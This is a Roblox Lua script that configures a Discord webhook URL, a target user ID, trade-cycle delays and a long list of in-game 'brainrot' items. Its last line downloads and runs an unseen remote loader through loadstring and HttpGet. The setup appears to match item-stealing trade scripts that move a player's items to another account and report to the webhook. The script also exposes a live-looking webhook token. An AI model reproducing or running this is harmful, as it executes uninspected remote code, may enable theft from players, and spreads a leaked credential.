getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477622763081433200/gZGTOJ9niWSvnW7ZML4q2V2LIBJpHYGrSu4BZsI7_emJU2sQ3mS7nUE9h-jbVByOeHlk"
getgenv().TARGET_ID = 1718063814
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Agarrini la Palini"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Chillin Chili"] = true,
    ["Chipso and Queso"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Cannelloni"] = true,
    ["Festive 67"] = true,
    ["Garama and Madundung"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true,
    ["Ketupat Kepat"] = true,
    ["La Casa Boo"] = true,
    ["La Extinct Grande"] = true,
    ["La Jolly Grande"] = true,
    ["La Romantic Grande"] = true,
    ["La Spooky Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Lavadorito Spinito"] = true,
    ["Los Bros"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Los Spaghettis"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Reinito Sleighito"] = true,
    ["Spooky and Pumpky"] = true,
    ["Swag Soda"] = true,
    ["Swaggy Bros"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Tralaledon"] = true,
    ["Tuff Toucan"] = true,
    ["W or L"] = true,
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Perrito Burrito"] = true,
    ["Los Tralaleritos"] = true,
    ["Las Tralaleritas"] = true,
    ["Strawberry Elephant"] = true,
    ["Graipuss Medussi"] = true,
    ["Fragola La La La"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Extinct Matteo"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Karker Sahur"] = true,
    ["Bunnyman"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["GOAT"] = true,
    ["Mariachi Corazoni"] = true,
    ["Los Tacoritas"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Los Sekolahs"] = true,
    ["Rosey and Teddy"] = true,
    ["La Supreme Combinasion"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Rocco Disco"] = true,
    ["Los Trios"] = true,
    ["La Sahur Combinasion"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["25"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["Chill Puppy"] = true,
    ["Los Sweethearts"] = true,
    ["Spinny Hammy"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Los 25"] = true,
    ["Chimnino"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Los Quesadillas"] = true,
    ["67"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Los Combinasionas"] = true,
    ["List List List Sahur"] = true,
    ["Job Job Job Sahur"] = true,
    ["Lovin Rose"] = true,
    ["Chicleteira Bicicleteira"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
